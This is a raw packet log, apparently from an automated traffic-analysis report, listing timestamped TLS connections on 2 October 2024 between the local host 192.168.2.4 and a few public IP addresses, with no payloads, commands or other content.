                                                                                        Oct 2, 2024 17:15:15.217766047 CEST49745443192.168.2.4188.114.96.3
                                                                                        Oct 2, 2024 17:15:15.218888998 CEST49745443192.168.2.4188.114.96.3
                                                                                        Oct 2, 2024 17:15:15.218909979 CEST44349745188.114.96.3192.168.2.4
                                                                                        Oct 2, 2024 17:15:15.318738937 CEST49746443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:15.318779945 CEST44349746104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:15.318844080 CEST49746443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:15.319175005 CEST49746443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:15.319191933 CEST44349746104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:15.789227009 CEST44349746104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:15.789664984 CEST49746443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:15.789704084 CEST44349746104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:15.790745974 CEST44349746104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:15.790813923 CEST49746443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:15.907052040 CEST49746443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:15.907210112 CEST49746443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:15.907219887 CEST44349746104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:15.907255888 CEST44349746104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:15.953099966 CEST49746443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:15.953121901 CEST44349746104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:15.997107029 CEST49746443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:16.043967962 CEST44349746104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:16.044131041 CEST44349746104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:16.044203043 CEST49746443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:16.050101995 CEST49746443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:16.050146103 CEST44349746104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:16.055685043 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:16.055743933 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:16.055815935 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:16.056945086 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:16.056963921 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:16.522349119 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:16.569670916 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:16.950431108 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:16.950476885 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:16.951325893 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:16.955204010 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:16.955416918 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:16.955632925 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:16.999420881 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.067364931 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.067423105 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.067449093 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.067473888 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.067496061 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.067518950 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.067533016 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.067704916 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.067738056 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.067743063 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.067785978 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.067846060 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.067851067 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.071901083 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.071928024 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.071952105 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.071969032 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.071981907 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.072002888 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.126714945 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.154982090 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.155060053 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.155092001 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.155105114 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.155124903 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.155165911 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.155168056 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.155179024 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.155221939 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.155226946 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.155333042 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.155374050 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.155378103 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.156318903 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.156352997 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.156373978 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.156378984 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.156409025 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.156445980 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.156446934 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.156457901 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.156481028 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.156903028 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.156984091 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.156989098 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.157037020 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.157066107 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.157074928 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.157079935 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.157120943 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.157685041 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.157814026 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.157900095 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.157949924 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.160528898 CEST49747443192.168.2.4104.18.95.41
                                                                                        Oct 2, 2024 17:15:17.160543919 CEST44349747104.18.95.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.190690041 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.190752029 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.190823078 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.191606045 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.191617012 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.238555908 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.238595963 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.238707066 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.238913059 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.238924026 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.660923958 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.661302090 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.661334038 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.662744999 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.662821054 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.663376093 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.663465977 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.663544893 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.663554907 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.717499971 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.743681908 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.744021893 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.744041920 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.745026112 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.745120049 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.745569944 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.745621920 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.745699883 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.745706081 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.794956923 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.803561926 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.803700924 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.803766012 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.803797960 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.803828001 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.803879023 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.803914070 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.804063082 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.804122925 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.804160118 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.804254055 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.804328918 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.804337978 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.804362059 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.804439068 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.804455042 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.808074951 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.808152914 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.808167934 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.857522011 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.891632080 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.891706944 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.891740084 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.891741991 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.891757011 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.891788960 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.891803980 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.891963959 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.891993999 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.891995907 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.892005920 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.892035007 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.892060041 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.892664909 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.892693043 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.892704010 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.892714024 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.892745018 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.892802000 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.893475056 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.893551111 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.893564939 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.893588066 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.893590927 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.893595934 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.893610954 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.893635988 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.893654108 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.893671036 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.893697023 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.893727064 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.893733978 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.893744946 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.893773079 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.893779993 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.894048929 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.894072056 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.894105911 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.894110918 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.894139051 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.894150019 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.894845009 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.894866943 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.894912004 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.894916058 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.894970894 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.901559114 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.947745085 CEST49750443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.947787046 CEST44349750104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.947838068 CEST49750443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.948077917 CEST49750443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.948088884 CEST44349750104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.948824883 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.948829889 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.948851109 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.980393887 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.980444908 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.980470896 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.980726004 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.980777979 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.980914116 CEST49748443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.980927944 CEST44349748104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.985794067 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.985980988 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.986031055 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.986049891 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.986052990 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.986063957 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.986099958 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.986618996 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.986639977 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.986665010 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.986671925 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.986701012 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.987148046 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.987258911 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.987279892 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.987304926 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.987309933 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.987353086 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.987356901 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.988095045 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.988116026 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.988132000 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.988137960 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.988177061 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.988641024 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.988940001 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.988960028 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.988982916 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.988986969 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.989042044 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.989044905 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.989732981 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.989764929 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:17.989768982 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.030080080 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.030102968 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.076239109 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.078443050 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.078511000 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.078557014 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.078568935 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.078666925 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.078696012 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.078701019 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.078943014 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.078998089 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.079001904 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.079049110 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.079180002 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.079186916 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.079210997 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.079397917 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.079459906 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.079463959 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.080023050 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.080073118 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.080076933 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.080111027 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.080219984 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.080269098 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.080841064 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.080883026 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.081052065 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.081095934 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.081232071 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.081268072 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.081785917 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.081851006 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.082216978 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.082240105 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.082262993 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.082268000 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.082324028 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.082731962 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.082782984 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.082787037 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.082830906 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.170922041 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.171003103 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.171120882 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.171166897 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.171278000 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.171334028 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.171519041 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.171576023 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.171762943 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.171801090 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.171927929 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.171977997 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.172128916 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.172173023 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.172446966 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.172497988 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.172504902 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.172549009 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.172822952 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.172993898 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.173091888 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.173095942 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.173137903 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.173201084 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.173245907 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.173249960 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.173291922 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.173578978 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.173630953 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.173640966 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.173675060 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.173813105 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.173887968 CEST44349749104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.173964024 CEST49749443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:18.174309015 CEST49749443192.168.2.4104.18.94.41
